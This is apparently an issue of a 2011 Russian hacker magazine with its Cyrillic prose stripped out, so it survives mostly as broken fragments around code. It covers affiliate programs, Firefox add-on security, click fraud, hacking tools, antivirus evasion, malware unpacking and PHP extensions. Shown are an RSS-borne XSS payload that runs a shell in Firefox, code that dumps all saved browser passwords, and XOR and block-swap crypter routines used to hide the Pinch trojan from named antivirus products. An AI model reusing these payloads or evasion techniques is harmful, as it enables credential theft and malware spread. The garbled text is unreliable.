FGH
. , -
, ,
, .

Royal-Cash.com
EarnCoin.com
Aepartnership.com
FerroCash.com
CashManiacs.com
2001
2003
2003
1999
2003
/ -
5060% $3040

50%
50%
50%
50%
44
23
173
58
128
check, wire, Payoneer,

ACH, WebMoney,
Paxum, eCoin
check, wire,
WebMoney, Paxum,
eCoin, ePese
wire, Payoneer,
WebMoney, Paxum,
eCoin
Paxum,
ePayService
check, wire,
WebMoney, Paxum,
ePayService
$100
$100
$300
$50
070
12 /155/ 2011
:
:
:
PPC (PAY PER CLICK)
. Pay per
click . PPC- ,
-. ( ), , .
,
. , ,
. (bid) ,
() . , , ,
, -. PPC- .
, bid, .
, ,
.
,
PPC.
,
.
:

.
,
.

,
,

( ,
).
,
.
.

Bidtraffic.com
Click9.com
Peakclick.com
Daoclick.com
Thegreenppc.com
Bizzclick.com
2004
2008
2005
2009
2009
2009
/ -
7095%
70%
70%
80%
80%
75%
$40
$50
$100
$50
$50
$10
ePassporte,
PayPal,
StormPay,
EPESE,
WebMoney
Epese,
Webmoney,
Wire
Wire,
ePassporte,
Western Union,
WebMoney
Webmoney,
ePassporte,
EPESE,
PayPal, Wire
Webmoney, Wire,
PayPal
ePassporte, PayPal,
StormPay, EPESE,
Visa, MasterCard,
Western Union,
PayPal, Wire, Liberty
Reserve, WebMoney
12 /155/ 2011
071
:
:
:

.
. : , , .
,
, . , , .
, , ,

. (2045%)
.

(, ,
. .).

-,
,
. . ,
-.
.
, ,
.
,
,

.

, .
Uffiliates.com
Affactive.com
Fulltiltpoker.com
AffClub.com
Pokerstarspartners.com
2008
2009
2004
2007
2007
/ -
2540%

3045%

2035%
$70225
2540%
$50150
2030%
$75150
-,
,

-,
MoneyBookers,
Neteller, Wire,
Check
MoneyBookers,
Neteller,
Wire, Check,
Webmoney
Neteller, Visa,
MasterCard, Maestro,
EntroPay, Paysafecard,
Webmoney
Click2Pay, ClickandBuy,
EntroPay, Maestro,
MoneyBookers, Neteller,
Solo, Visa Delta, Visa
Electron, WebMoney, Wire
Instant eChecks,
Moneybookers,
ClickandBuy, Visa,
Neteller, Wire, Check,
WebMoney, EntroPay
072
12 /155/ 2011
:
:
:
,
. -
, , .
,
.
.
, .

( ),
,
.

-. ,
,
: -.

, , .
,
XML ,
.

.

,
.
Glavtorg.com
Stimul-Cash.com
Affiliate-program.Amazon.com
KingsProfit.com
2010
2010
1996
2010
()

()
()
/ -
2535%
25%
48%
25%
Webmoney, Epass,
PayPal, Wire
Webmoney, Epass, PayPal,

Wire, ePese, Moneybookers
Check
Webmoney, Wire
$100
$50
$10
$100
12 /155/ 2011
073
oxdef (oxdef.info)
Firefox

, ? , Firefox.

,
.
FIREFOX
Chrome (#06/11) Opera
(#06/11).
. -,
-
. Opera Google
Chrome, FF, ,
.
.
-
-
-.
Firesheep (codebutler.
github.com/firesheep), Wi-Fi

. ,
.
.
074
WWW

Mozilla:
mzl.la/u2Nol0.

Firefox Defcon 17:
bit.ly/u7BVcS.

,
:
bit.ly/sSzdbO.
Mozilla Firefox , , Mozilla

(Thunderbird, SeaMonkey . .) ,
:
XPI ( ) .
JavaScript JS, !
XUL (XML User Interface Language) XML .
DOM (Document Object Model) , .
CSS (Cascading Style Sheets) CSS- .
XPCOM/XPConnect .
, , , . XPI-.
, ZIP-
install.rdf XPInstall. :
chrome
content
browserOverlay.js
browserOverlay.xul
locale
en-US
browserOverlay.dtd
browserOverlay.properties
skin
browserOverlay.css
chrome.manifest
install.rdf
12 /155/ 2011
Firefox
Install.rdf ( RDF/XML),
.
: , , ,
, (
) . .
updateURL updateKey, .
install.rdf:
<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>helloworld@oxdef.info</em:id>
<em:name>Hello World</em:name>
<em:description>Hello world!</em:description>
<em:version>0.1</em:version>
<em:creator>Oxdef</em:creator>
<em:homepageURL>http://oxdef.info</em:homepageURL>
<em:updateURL>https://oxdef.info/update
</em:updateURL>
<em:type>2</em:type>
<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}
</em:id>
<em:minVersion>3.0</em:minVersion>
<em:maxVersion>6.0.*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
</RDF>
Mozilla Firefox
XML- XUL (
), , , .
JavaScript, . . XPCOM (. Cross Platform
Component Object Model)
. , , , .
, JavaScript, Java, Python,
C++.
XPCOM-. XPConnect
,
(, ,
, ).
Gecko.
.
, , XPCOM- .
().
XUL- ( content).
XUL- JavaScript:
Mozilla Firefox
<menubar id="main-menubar">
<menu id="helloworld-hello-menu"
label="&helloworld.hello.label;"
accesskey="&helloworld.helloMenu.accesskey;"
insertafter="helpMenu">
<menupopup>
<menuitem id="helloworld-hello-menu-item"
label="&helloworld.hello.label2;"
accesskey="&helloworld.helloItem.accesskey;"
oncommand=
"XULSchoolChrome.BrowserOverlay.sayHello(event);" />
</menupopup>
</menu>
</menubar>

. , , (chrome://...),
. . chrome.manifest
chrome- ,
, , :
content
helloworld
chrome/content/
overlay chrome://browser/content/browser.xul chrome://
helloworld/content/browserOverlay.xul
skin
helloworld classic/1.0 chrome/skin/
locale
helloworld en-US
chrome/locale/en-US/

<script type="application/x-javascript"
src="chrome://helloworld/content/browserOverlay.js" />
<stringbundleset id="stringbundleset">
<stringbundle id="helloworld-string-bundle"
src="chrome://helloworld/locale/browserOverlay.properties"/>
</stringbundleset>
12 /155/ 2011
, , , .
:
addons.mozilla.org (. AMO);
.
075
,
.
: updateURL updateKey.
updateURL
, XML/RDF-
.
( )
.
<em:updateURL>http://www.foo.com/update.cgi?id=%ITEM_ID%
&version=%ITEM_VERSION%</em:updateURL>
,
,
Wi-Fi. ,
Mozilla ,
HTTP- updateURL.

updateKey. ,
, ,
, :
<em:updateKey>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDK42
6erD/H3XtsjvaB5+PJqbhjZc9EDI5OCJS8R3FIObJ9ZHJK1TXeaE7JWq
t9WUmBWTEFvwS+FI9vWu8058N9CHhDNyeP6i4LuUYjTURnn7Yw/Igz
yIJ2oKsYa32RuxAyteqAWqPT/J63wBixIeCxmysfawB/zH4KaPiY3vn
rzQIDAQAB</em:updateKey>

signature ( ) updateHash,
- xpi-
. McCoy
.
AMO
AMO. , ,
, updateURL.
,
:
*** LOG addons.updates: Requesting https://versioncheck.
addons.mozilla.org/update/VersionCheck.php?reqVersion=2&
id=inspector@mozilla.org&version=2.0.10&maxAppVersion=8.0a1&
status=userEnabled&appID={ec8030f7-c20a-464f-9b0e13a3a9e97384}&appVersion=5.0&appOS=Linux&appABI=x86_64-gcc3&
locale=en-US&currentAppVersion=5.0&updateType=97
*** LOG addons.xpi: Calling bootstrap method startup on jid0t3eeRQgGANLCH9c50lPqcTDuNng@jetpack version 0.0.19
*** LOG addons.updates: Requesting https://localhost/update.rdf
*** WARN addons.updates: HTTP Request failed for an unknown reason
,
, SSL. , , ,
.
AMO, -
. 20
AMO ,
AMO.
076
RSS-
AMO, ,
.
AMO , , - .

(
).
AMO, . ,
. AMO
AMO. : .
-
.
,
AMO.
, (
) AMO.
, ,
,
.
.
,
,
AMO.
. AMO.
, .
. , , .

. ,
,
. . ,
, ,
. .
:
JavaScript;
Remote XUL;
.

,
, AMO,
.
,
Opera Chrome.
,
. . , chrome://.
, XPCOM ,
.
12 /155/ 2011
Firefox
args=["-c","galculator"];
process.run(false,args,args.length);
})()+alert('XSS/foo
</link>
<pubDate>Sun, 21 Aug 2011 21:34:10 +0400</pubDate>
<description>some text</description>
</item>

XPCOM . ,

, .
, , URI data:..?
JS ,
- DOM Based XSS .
. , , , ,
, data-.
Simple RSS Reader AMO

.
, . ,
,
. , RSS-
, , - .
Simple RSS Reader (bit.ly/
t0oJO6),
.
RSS-, , . , - .
,
( ).
. , ,
feedUri.
- :
menuitem.setAttribute('onmouseover',
"SRR.setStatusBar('"+feedUri+"')");
RSS- (
XML-, )
, (
, ) ,
. :) -,
,
... ! !

(, !)
:
<item><title>some title</title>
<link>
data:eeee')+(function()
{
file=Components.classes["@mozilla.org/file/local;1"].
createInstance(Components.interfaces.nsILocalFile);
file.initWithPath("/bin/sh");
process=Components.classes["@mozilla.org/process/util;1"].
createInstance(Components.interfaces.nsIProcess);
process.init(file);
12 /155/ 2011

,
.
. .
-, ? -,
,
!
:
var dump = '';
try
{
var myLoginManager = Components.classes[
"@mozilla.org/login-manager;1"].
getService(Components.interfaces.nsILoginManager);
var logins = myLoginManager.getAllLogins({});
for (var i = 0; i < logins.length; i++)
{
dump = dump + logins[i].hostname + ':' +
logins[i].username + ':' + logins[i].password +
'\n';
}
alert(dump);
}
catch(ex)
{
// This will only happen if there is no
// nsILoginManager component class
}
, , eval()
. , , , AMO.
OUTRO
Add-on SDK, JetPack.
XUL!
JavaScript, HTML CSS.

. , ! ;) z
077
life4u (a.e.faronov@gmail.com)
:
AdSense

10 .

.
,
.
078
WWW
www.google.com/
adsense Google
AdSense;
direct.yandex.ru
.;
www.spybox.com.
ua
-
SpyBox;
www.adwatcher.com

Adwatcher;
jspy.ru

;
piwik.org
Piwik;
www.google.
com/analytics/
.
( . click fraud )
, () .
( ,
, ),
( ). ,
1015 % .
,
. PPC-.
,
. , . , .
AdSense .
,
. , ,
12 /155/ 2011
: AdSense
SpyBox
- Adwatcher
, , (
-, $0,1 ).
: , , - !
.
,
, , .
, , . . ,
,
.
, , .
.
, .
.
.
PPC- (Pay-perClick , ,
, ). ,
.
(, IP ).
,
.
12 /155/ 2011

, ,
,
.
,
.
1. IP-,
, - .
, IP
.
2. ,
, , :
,
,
.
079

?
:
PPC- ?
, /
. , . 2007
Yahoo! .
Checkmate Strategic Group.
Yahoo!
2004 .
2006 Google
90 .

,
,
.
3. , ,
( , , ), :
.
4. , , .
. :
, (, - ),
,
100.
.
5.
,
.
: SPYBOX
, .
. , / ,
,
. , 100 % , ( ,
).
-
SpyBox. , -,
, ,
, , ,
.
: HTML-,
</body>.
(
):
<noindex>
<script type='text/javascript'>
var script=document.createElement('script');
080
script.type='text/javascript';
...
if(localStorage.spybox)
{
var spybox_hash='a181a603769c1f98ad927e7367c7aa51';
var spybox_session=localStorage.spybox;
script.src='http://ua.robotreplay.net/fast.js';
}
...
document.getElementsByTagName("head")[0].
appendChild(script);
</script></noindex>

, , . :
, ,
- .

, . ,
IP

( ,
- ),
. . , SpyBox
: (
1000 ),
( , ,
,
).
ADWATCHER
SpyBox, , , .
,
, , ?
Adwatcher,
, SpyBox,
!
,
,
.
, !
2003 ,
Google 150 .
, ,
, Google
Clique , Google
. , Google ,
. ,
,
. , ,
2009 . Microsoft ,
,
Microsoft.
750 .
- .
, ,
.
12 /155/ 2011
: AdSense
- Adwatcher
,
Google Analytics
xakep.ru
.
-
( IP) (,
, , , , ).
( )
30- . ,
fraud reports, .
,
, ( ,
)
:
<script language="javascript" type="text/javascript">
...
document.write('
<img src="http://s8.adwatcher.net/demov3/tracker.
php?t='+ id[1]+'&ref='+r+'&land='+l+'"
style="border:0px;width:1px;height:1px;" />');
</script>
,

. Adwatcher 30
. ,
, ,
,
Adwatcher SpyBox.
12 /155/ 2011
,

: Google Analytics Piwik (
PHP-,
). , ,
,
. :
, ,
. , ,
( 40 ,
), ,
.

. ,

.
,
,
. ,

. ,

, .
, (
, ).
,
. ,
, ,
,

, :). z
081
(icq 884888, http://snipper.ru)
X-Tools

:
BECHED
:
Max Artemev
:
Zdez Bil Ya
URL:
bit.ly/nIXs3V
URL:
widecap.ru
URL:
bit.ly/qLkZuZ
:
*nix/win
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
WEB-SHELL
SSI
C
WIDECAP

TWITTER REGGER
, ,
PHP-
. ,
. ,
- - .

,
,
.
.
? ! SSI
(server side includes) ,
, #exec
cmd.

.

SSI-,

PHP. :
;
SSI- ;
;
HTTP_COOKIE;
JavaScript.
WideCap , TCP/IP- -
-.

Winsock.
: SOCKSv4, SOCKSv5, HTTP/
HTTPS.
:
1. .
:
, , DNS, , .
2. -, .
3. .

,
.
4. .
, .
,

.
, :
(
e-mail);
;
(, , );
( avatars);
;
.
082
, ,
WideCap - :).
: ,
, ,
,
- ..
, . , ,
.

name.txt.

accounts.txt.
,
.
,
.
12 /155/ 2011
X-Tools
:
S4(uR4
URL:
bit.ly/pxjMKi
:
*nix/win
ALANA K!LL3R
,
HTTP- Apache (bit.ly/rqvHBi),
,
.

, ,

!
Alana K!LL3R
S4(uR4
. ,
.
, PoC
killapache.pl Kingcope.
--
,

. S4(uR4
PHP + cURL
Perl ,
(, ,
. .).
:
GET- (byte ranges)
,
.
:
Gremwell
:
Danijel Maxa MaXoNe
:
VaZoNeZ
URL:
www.gremwell.com
URL:
bit.ly/orsqKn
URL:
vazonez.com/page/
stegano
:
*nix/win
:
Windows 2000/
XP/2003 Server/
Vista/2008 Server/7
: Windows
2000/XP/2003 Server/
Vista/2008 Server/7
MAGICTREE:

SQL- MAXSQLI
SYNTAX BUILDER

BMP-
-
,
, , nmap? ?
, MagicTree.

.

(W3AF,
Acunetix, OpenVAS, Nessus, Burp, nmap . .),

(, nmap nikto)
(HTML, MS Word .).
Tree ()
,
,
Magic ()
,
,
.
,
,
www.gremwell.com/
documentation.
/
/HTTP-/
SQL-,
MaxSQLi Syntax Builder,
SQL-.

SQLi, error based. :
;

UNION;
WAF
;
;
;
;
;
, ;

string integer based.

,
,
. , ,

. Stegano,

BMP.
,
:
1. -.
2.
.
3. (,
).
4. (

)
.
, , ,
,
,
SQL-.

,

: .

.
12 /155/ 2011
083
MALWARE
deeonis (deeonis@gmail.com)

. ,
,

,
.
.
084
, ,
. , - ,
exe-.
;).
,
-.
, .

. , , ,
-, .
.
,
,
. ,
. ,
.

1. Kaspersky Crystal. . Kaspersky
Crystal .
,
.
, .
2. Dr. Web Security Space. Dr. Web Security Space,
.
12 /155/ 2011
FLY-CODE, , ,
.
3. ESET NOD32 Smart Security 5. ESET NOD32
Smart Security 5. ,
. , ,
,
.
4. Avast! Free Antivirus.
Avast! Free Antivirus.
, ,
.

. exe ,
. PE-
.
,
.
.
exe, API,
exe, , .

,
HLL-. ,
,
. , .

Pinch. exe- , .
Trojan-PSW.Win32.LDPinch.dlt, Dr. Web Trojan.Packed.1197,
NOD32 Win32/PSW.LdPinch.NMJ, Avast ,
Win32:LdPinch-NO [Trj]. ,
notepad.exe. ,
.
1
.
MZ- PE-,

. - notepad.exe.
,
,
API- .
Kaspersky Cristal.
.
. NOD32 Smart Security , Win32/PSW.LdPinch.NMJ.
Avast ,
, .
,
. - , ,
:).
,
. , .
xor
PVOID cryptBinary(PVOID pfile, DWORD fsize)
{
DWORD key = 0x45F983A0;
PVOID crypt_file = new BYTE[fsize];
CopyMemory(crypt_file, pfile, fsize);
for (size_t i = 0; i < (fsize / sizeof(DWORD)); i++)
{
((DWORD*)(crypt_file))[i] ^= key;
}
return crypt_file;
}
, . , , .
, . Dr. Web
. NOD32 Smart Security 5 :
, .
Avast, .
. . , xor, , ?
2
.
32- .
xor. ,
, ,
12 /155/ 2011
xor
085
MALWARE
KASPERSKY?
, Kaspersky Crystal,
. -,
Trojan-PSW.Win32.LDPinch.dlt,
, ,
Trojan-PSW.Win32.LDPinch.zie.
, -
.
,
, . ,

.
, ,

,
. , ,
, ,
, ,
,
.
Pinch, -
3
, , xor ,
Kaspersky Dr. Web,
.
. 142-
. ,
API.
CreateFile,
ntldr. ,
, , ,
INVALID_HANDLE_VALUE.
. ,
, , ,
CreateFile.
CreateFile
{
HANDLE h = CreateFileA("e:\\ntldr",
FILE_READ_ACCESS, 0, 0,
OPEN_EXISTING, 0, NULL);
if (h != INVALID_HANDLE_VALUE)
{
for (size_t i = 0;
i < (fsize / sizeof(DWORD));
i++)
{
}
}
return crypt_file;
}
086
NOD32
, CreateFile
, INVALID_HANDLE_VALUE.
, , , API.
, ,
. ,
, Trojan-PSW.Win32.LDPinch.zie.
Dr. Web Security Space . ,
, Infected Archive. NOD32 Avast Free
Antivirus .
.
4
:
, , ,
?
, ? ,
,
PE- .
,
, , . , notepad.exe
,
.
, : ,
NOD32 Avast .
.
, . Pinch
.
12 /155/ 2011
5

. xor
, Dr. Web,
.
256
.
, .

{
//
CopyMemory(
crypt_file,
(VOID*)(((BYTE*)pfile) + 0x100 ),
fsize - 0x100);
CopyMemory(
(VOID*)(((BYTE*)crypt_file) + (fsize - 0x100)),
pfile,
0x100);
for (size_t i = 0; i < (fsize / sizeof(DWORD)); i++)
{
}
return crypt_file;
}
,
, 4. Kaspersky Crystal Dr. Web
, . ,
, , , ,
- . ,
, , .
6
.
.
, .
, , C++
:

void swapMemBlock(ULONG begin, ULONG end)
{
ULONG half = (end - begin) / 2;
if (half < 0x4)
return;
BYTE *buff = new BYTE[end - begin];
ZeroMemory(buff, end - begin);
CopyMemory(buff, (PVOID)begin, end - begin);
CopyMemory((PVOID)begin, &buff[half], half);
CopyMemory((PVOID)(begin + half), buff, half);
12 /155/ 2011
delete[] buff;
swapMemBlock(begin, begin + half);
swapMemBlock(begin + half, end);
}
. Kaspersky, , NOD32 - .

. Kaspersky Crystal
. ,
, .
, Kaspersky Crystal,
. ! Dr.Web Security
Space . FLY-CODE
, . ESET
NOD32 Smart Security 5 Avast! Free Antivirus,
,
xor. ,
,
.

. ! z
087
MALWARE
(201074@mail.ru)

,

,
,
, , ,
, HIPS . . (
, :) ).

, .
088
DVD

ClamWin,
ClamAV
Windows, AVZ

.
WWW

: goo.gl/Usltc.
goo.gl/Kq3kw
,
(
-),
(BlackCash).
goo.gl/uI848

C++, goo.gl/ubwgt

C++.
12 /155/ 2011
1. , (: virulist.com)

,
,
. ,
:
,
,
.
,

( 1).

, . ,
, , ,

.
,

.
: , ,
,
. .

:
.
.
2. md5- ClamAV
: md5-,
( )

.
() , . ,
,
, ,
. ,
,
, . , -
12 /155/ 2011
3. HEX- ClamAV
089
MALWARE
,

, , ,
iChecker.
, .
. ,
, :
, .

. , Panda Software UltraFast,
AVZ ,
( )
( ).
iSwift ( iStream)
iChecker
NTFS.

,
.
4. , AVZ
.
. ,
md5-
.

ClamAV. , ,
, .
: main.cvd
daily.cvd.
. 2
md5-.
: md5-, , .

: ; , ; ,
090
5.
( ); - ;
, , . .
,
HEX-,
( 20 400 ),
.
,

. ,
.
(
)
(
). 3
HEX- daily.cvd
ClamAV. , .
, :
, , .
, . ,
, . ,
( )
, HEX.
.

, .
,
, .
,
-.
,
( , ,
JS-,
).
( ), -
12 /155/ 2011
, ,
:
EXECUTE READ,
WRITE;
PE- ;
;
- .
6. Gigpycll Win32.Palevo
.
( API- FindFirst FindNext)
. , ,
, API- ( NtOpenFile NtCreateFile).
,
.
, ,
,

.

. , ,
,
( ,
). , , .
: ,

, .

, ,
.

,
. , ,

.
,

.
( ,
). ,
, , ,
.
12 /155/ 2011
, , ,
( , ;
).
, ,
. ,
,
. ,
.
,
. , .
, :
,
( );
, ( ).
, ? ,
. :

;
( ,
, ,
, ,
photo.jpg.exe);
( , ,

PE-, .pif .com);
(
.exe .pif).
, , AVZ ( 4).

,
.
. text.
PE- , ,
, jmp -
,
.
, , , ,
( 5).
,
, ,
.
, ,
(.text, .data, .idata, .rdata, .reloc, .rsrc). -
091
MALWARE
, API- , DLL , , ,
GetProcAddress ,
-
.
, ,
. , , .
.
7. API-,
DLL explorer.exe,

, ( 6).
- , , AntiVirus Plus
McAfee ,
. , - API-
URLDownloadToFile ShellExecute.
, , VirtualAlloc, WriteProcessMemory
CreateRemoteThread.
, . ,
, . ,
,
.
,
.
, . asm,
(
C#, C, C Builder VB). explorer.exe, , ,
,
, ,
, ( 7, 8).
, . ,
? ,
(
, ),

.

, . .
(AVZ, , UPX).
092
, , ,
.
:
,
;
,
;

.
.
- .
. , ,
. ,
.
, , .
( ,
, , ,
) ,
.
, .
,
, .
.
:
1. , ( , , ,
. .).
2. .
3. .
4. .
:
5. ( ,
,
, ).
6. ( , , ),
, 7 8 ,
(, ).
7. 9.
8. .
9. ( ,
).
12 /155/ 2011
8. API-, -,

10. ( EIP).
11. ( ,
,
).
.
, ,
,
. ,
, .
EDX, ESP EIP.
. EDX EIP
,
. ESP,
. ESP ,
.

.
12 /155/ 2011
,

, , .
.
(
), . ,
,

.
.
, , ,
, , , .
, , HIPS, ,
- . z
093
MALWARE
(www.esagelab.ru)

PoC
,

, , .

?
.
,
, , . ,

,
malware, , -. ,

? ? ,
,

,
.

:

, ,
.
, Dynamic Binary
Instrumentation Engine. ,
-
,
.

UnFSG (bit.ly/v1nV81), (bit.ly/vNYAYA).
,
.

, ,
.
:

, , ,
, . ,
094
12 /155/ 2011
CreateToolHelp32Snapshot() SpyEye,
, Fast Universal Unpacker (code.google.com/p/fuu/)

ap0x Unpack Engine (bit.ly/vDTZXp).
TitanEngine ReversingLabs (bit.ly/rEHXSq).
, - ,
.

.
,
, , ,
,
.

,
- (
,
), .

:
1. , CreateProcess() DEBUG_PROCESS.
2. WaitForDebugEvent()
,
.
3. , ,

. , SpyEye
12 /155/ 2011
CreateToolHelp32Snapshot(). ,
0xCC ( int 3) WriteProcessMemory().
4. ,
ReadProcessMemory()
.
,
, ,

. :
1. FileAlignment SectionAlignment.
2. ImageBase
,
.
3.
RawOffset VirtualOffset .
, , (
), , ,
IDA Pro LoadLibraryEx() DONT_RESOLVE_DLL_REFERENCES
.
PO: SIMPEUNPACKER

SimpeUnpacker,
GitHub
(github.com/Cr4sh/SimpleUnpacker). SimpeUnpacker
,
:
095
MALWARE
IDA Pro
> SimpleUnpacker.exe <input_file> --bp <module>!<function>
input_file
, , '--bp'
, .

'--bp' .
dumped.exe.
,
, .
SimpleUnpacker.exe SpyEye:
C:\> SimpleUnpacker.exe dropper.exe --bp kernel32.dll!
CreateToolhelp32Snapshot
[+] Breakpoint: kernel32.dll!CreateToolhelp32Snapshot()
[+] Process command line: "dropper.exe"
CREATE_PROCESS: ImageBase=0x00400000,
StartAddress=0x00420090
DLL_LOAD: 0x7c900000 "ntdll.dll"
DLL_LOAD: 0x7c800000 "C:\WINDOWS\system32\kernel32.dll"
[+] Breakpoint on kernel32.dll!CreateToolhelp32Snapshot()
has been set: 0x7c865b1f
DLL_LOAD: 0x7e410000 "C:\WINDOWS\system32\USER32.dll"
DLL_LOAD: 0x77f10000 "C:\WINDOWS\system32\GDI32.dll"
DLL_LOAD: 0x73000000 "C:\WINDOWS\system32\WINSPOOL.DRV"
DLL_LOAD: 0x77dd0000 "C:\WINDOWS\system32\ADVAPI32.dll"
DLL_LOAD: 0x77e70000 "C:\WINDOWS\system32\RPCRT4.dll"
DLL_LOAD: 0x77fe0000 "C:\WINDOWS\system32\Secur32.dll"
DLL_LOAD: 0x77c10000 "C:\WINDOWS\system32\msvcrt.dll"
DLL_LOAD: 0x3d930000 "C:\WINDOWS\system32\WININET.dll"
DLL_LOAD: 0x77f60000 "C:\WINDOWS\system32\SHLWAPI.dll"
DLL_LOAD: 0x78130000 "C:\WINDOWS\system32\urlmon.dll"
DLL_LOAD: 0x774e0000 "C:\WINDOWS\system32\ole32.dll"
096
DLL_LOAD: 0x77120000 "C:\WINDOWS\system32\OLEAUT32.dll"

DLL_LOAD: 0x3dfd0000 "C:\WINDOWS\system32\iertutil.dll"
EXCEPTION_BREAKPOINT at 0x7c90120e
CREATE_THREAD: StartAddress=0x00000000
DLL_LOAD: 0x76390000 "C:\WINDOWS\system32\IMM32.DLL"
DLL_LOAD: 0x773d0000 "C:\WINDOWS\WinSxS\x86_Microsoft.Win
dows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\
comctl32.dll"
CREATE_THREAD: StartAddress=0x7c8106e9
EXCEPTION_BREAKPOINT at 0x7c865b1f
[+] Breakpoint occurs: kernel32.dll!CreateToolhelp32Snapshot
[+] Dumping image 0x00400000 Size=0x0007d000
Fixing FileAlignment 0x00000200 -> 0x00001000
Fixing section raw address 0x00000400 -> 0x00001000
[+] Image dumped to "dumped.exe"
DONE
, -
,
. ,
, TOP 100 VirusTotal SpyEye. ,
70% (
SpyEye
, ). ,
,
.
,
, . z
12 /155/ 2011
M0r1arty (moriarty@front.ru)
PHP
PHP-
PHP
,
.

,
.
WARNING
DVD
,

mysql_connect.
12 /155/ 2011
WWW
devzone.zend.com/
article/1021
3
.
habrahabr.ru/blogs/
php/98862/

.
http://bit.ly/
nm0fTy
.
gnuwin32.sourceforge.net/
.
http://pecl.php.net/

.
http://bit.ly/n3pnhK

,
PHP .
PHP
, Extension
Writing . .

ext
PHP. , , . ,
: config.m4
config.w32. UNIX-,
Windows. configure
, ; ,

. .
,
Makefile .

MINIT.
, , INI entry . .
097

:
Zend, , php.ini,
dl, deprecated.
RINIT. ,
.
RSHUTDOWN. , , RINIT.
web- Zend MSHUTDOWN. . /
MINIT/MSHUTDOWN,
RINIT/RSHUTDOWN.

Zend
. , malloc/free/calloc/realloc . .,
- (. 1). Zend
: Non-Persistent ( e) Persistent (
pe). , Persistent
( ) , NonPersistent . , MINIT-RINIT-RSHUTDOWNMSHUTDOWN ,
emalloc, emalloc MINIT,
RINIT
. , Non-Persistent , Persistent . malloc/free
.
ZTS
, ,
. PHP ZTS (Zend Thread-Safety). ZTS TSRM
(Thread Safe Resource Management). ,

(), .
TSRM :
TSRM.h, ZEND_BEGIN_
MODULE_GLOBALS ZEND_END_MODULE_GLOBALS
,
, ( )
ZEND_DECLARE_MODULE_GLOBALS,
, MINIT ZEND_
INIT_MODULE_GLOBALS.
, - . PHP.
tsrm_tls_table resource_types_table,
tsrm_ls. :
static tsrm_tls_entry **tsrm_tls_table=NULL;
static tsrm_resource_type *resource_types_table=NULL;
void ***tsrm_ls;
typedef struct {
size_t size; //
ts_allocate_ctor ctor; //
ts_allocate_dtor dtor; //
int done; //
} tsrm_resource_type;
struct _tsrm_tls_entry {
098
GnuWin32 ,
UNIX
void **storage; //
int count; //- storage
THREAD_T thread_id; //
tsrm_tls_entry *next; //
};
tsrm_tls_table , tsrm_tls_enty .
resource_types_table, , , ( )
ZEND_INIT_MODULE_GLOBALS,
ts_allocate_id:
#define ZEND_INIT_MODULE_GLOBALS(module_name, \
globals_ctor, globals_dtor) \
ts_allocate_id(&module_name##_globals_id, \
sizeof(zend_##module_name##_globals), \
(ts_allocate_ctor) globals_ctor, \
(ts_allocate_dtor) globals_dtor);
TSRM_API ts_rsrc_id ts_allocate_id(ts_rsrc_id *rsrc_id,
size_t size, ts_allocate_ctor ctor,
ts_allocate_dtor dtor);
rsrc_id , , size
, ctor/dtor /
. ctor-, , , ,
( ).
12 /155/ 2011
PHP
tsrm_ls storage .
TSRMLS_C/TSRMLS_CC. ,
.
?
. tsrm_tls_table
. tsrm_tls_table resource_types_table SAPI,
tsrm_startup. tsrm_startup SAPI
tsrm_ls ts_resource_ex(0,NULL):
TSRM_API void *ts_resource_ex(
ts_rsrc_id id, THREAD_T *th_id);
ts_resource_ex tsrm_tls_table
tsrm_tls_entry , th_id ( NULL,
). ,
allocate_new_resource tsrm_tls_entry
, ,
tsrm_tls_entry.next .
TSRM. allocate_new_resource,
, storage .
( ) tsrm_resource_type.size,
(ctor) . , TSRM
. ( ) .

,

... . :
, .
, .
( ) .
PHP Windows.
PHP Linux ,
- .
PHP Windows. ,
.
, : nmake Makefile
Visual Studio php5ts.lib
. , ,
Windows, ,
?

PHP (goo.gl/TTgta). ,
. ,
VS2003, .

, GnuWin32.
(
Win-).
. MinGW. Cygwin, . ,
MinGW
./configure && make && make install.
12 /155/ 2011
,

PHP , ,
PHP libiconv. ,
, ,
MinGW PHP. .
. , MASM32
inc2l.exe.
inc- lib-.
_libiconv_version PROTO C ( , PHP
_libiconv_version). ...
PHP ,
. . ;)
. , VS2008.
PHP ( 5.3.8)
. (
, PHP).
, (
, - ),
. - GnuWin32?
, ,
, PHP,
Windows (,
). GnuWin32 ,
.
:
cd E:\gnuwin32\GetGnuWin32
download.bat
install E:\gnuwin32
PHP Apache, , MySQL- lib

include , , E:\dep.
. Visual
Studio. PHP. builconf, configure, nmake:
E:\php-5.3.8>buildconf
E:\php-5.3.8>configure --with-extra-libs=E:\dep\apache\
lib;E:\dep\mysql\lib;E:\gnuwin32\lib --with-extra-includes
=E:\dep\apache\include;E:\dep\mysql\include;E:\gnuwin32\
include --with-mysql=shared --with-mysqli=shared
--enable-pdo --with-pdo-mysql --with-pdo-sqlite=shared
--enable-mbstring=shared --with-curl=shared
--enable-apache2-2handler --enable-apache2-2filter
E:\php-5.3.8>nmake
,
Release_TS , php5ts.dll, php.exe . ,
!

Visual Studio, . , FileNew Project,
Makefile Project,
099

OK. General
Dynamic Library (.dll) Configuration Type.
C/C++/General Additional Include Directories
( ): G:\www\php-5.3.8;
G:\www\php-5.3.8\main\; G:\www\php-5.3.8\TSRM\; G:\www\php5.3.8\Zend\. Linker/General Additional Library Directories G:\www\php-5.3.8\Release_TS. Linker/Input Additional
Dependencies php5ts.lib. .
(C/C++/
Preprocessor Preprocessor Definitions):
ZEND_WIN32=1
PHP_WIN32=1
WIN32=1
ZEND_DEBUG=0
ZTS=1
COMPILE_DL_XHOOKER=1
, Windows. . ;)
: ,
, , . .
ZEND_DEBUG , (
php5ts.lib, php5ts_debug.lib).
ZTS , ZTS ( PHP
Thread Safe Non Thread Safe).
ZEND_DEBUG ZTS
, - ,
: --.
--. read. ,
.
COMPILE_DL_XHOOKER, , .
configure, , (--withextension=shared). XHOOKER
.

?
, ,
. . ,
, ,
scan parse_date.c 21
(!), #pragma optimize ("", off ).

, ,
(
). Apache
, PHP-
. ,
